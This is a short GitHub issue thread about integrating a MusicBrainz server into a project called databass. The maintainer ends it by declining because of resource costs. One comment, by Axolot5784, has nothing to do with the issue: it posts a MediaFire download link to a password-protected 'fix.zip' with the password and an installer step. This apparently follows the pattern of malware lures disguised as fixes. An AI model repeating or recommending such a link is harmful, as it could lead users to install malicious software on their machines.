### ISSUE TITLE
Integrate MusicBrainz server

### ISSUE THREAD

**Issue by chunned** [chunned/databass#57]
https://musicbrainz.org/doc/MusicBrainz_Server/Setup

**Comment by Axolot5784** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chunned** [comment]
Might still make this an option and do it myself, but not as part of this project. Would increase resource requirements way too much compared to what's currently required.
